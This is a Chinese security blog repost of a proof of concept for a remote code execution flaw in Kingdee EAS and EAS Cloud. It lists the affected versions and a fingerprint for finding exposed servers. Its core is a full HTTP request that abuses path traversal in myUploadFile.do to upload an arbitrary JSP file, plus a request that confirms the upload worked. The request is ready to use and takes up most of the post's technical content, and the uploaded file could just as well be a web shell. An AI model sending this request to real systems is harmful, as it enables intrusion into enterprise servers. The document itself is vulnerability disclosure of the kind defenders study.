【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

admin 2023年10月13日22:21:33评论190 views字数 1246阅读4分9秒阅读模式

免费&进群

【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞  
【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

本文由掌控安全学院 - 江月 投稿

【漏洞概述】

金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件,旨在帮助企业实现全面的管理和业务流程优化。

【漏洞介绍】

金蝶 EAS 及 EAS Cloud 存在远程代码执行漏洞

【影响版本】

金蝶 EAS 8.0,8.1,8.2,8.5
金蝶 EAS Cloud 8.6私有云,8.6公有云,8.6.1,8.8

【指纹】

app=”Kingdee-EAS”

【产品界面】

【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

【利用过程】
Kingdee EAS EAS Cloud myUploadFile.do接口存在任意文件上传问题

POST /easportal/xxx/%2e%2e/xxx/myUploadFile.do HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
Cookie: sl-session=sqPhC9MLJmWsiN7c9/P6tA==
Accept-Encoding: gzip, deflate
Content-Length: 210
SL-CE-SUID: 47

------WebKitFormBoundarySq4lDnabv8CwHfvx
Content-Disposition: form-data; name="myFile"; filename="/demo.jsp"
Content-Type: text/html

<%out.println("test123");%>
------WebKitFormBoundarySq4lDnabv8CwHfvx--

【验证】

GET /easportal/xxx/../demo.jsp HTTP/1.1
Host: 127.0.0.1

【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

【修复建议】

及时更新软件版本

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

没看够~?欢迎关注!


分享本文到朋友圈,可以凭截图找老师领取

上千教程+工具+交流群+靶场账号

 

【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

 分享后扫码加我


回顾往期内容

Xray挂机刷漏洞

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

点赞+在看支持一下吧~感谢看官老爷~ 

你的点赞是我更新的动力


原文始发于微信公众号(掌控安全EDU):【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月13日22:21:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】金蝶EAS、EAS Cloud远程代码执行漏洞http://cn-sec.com/archives/2109339.html

发表评论

匿名网友 填写信息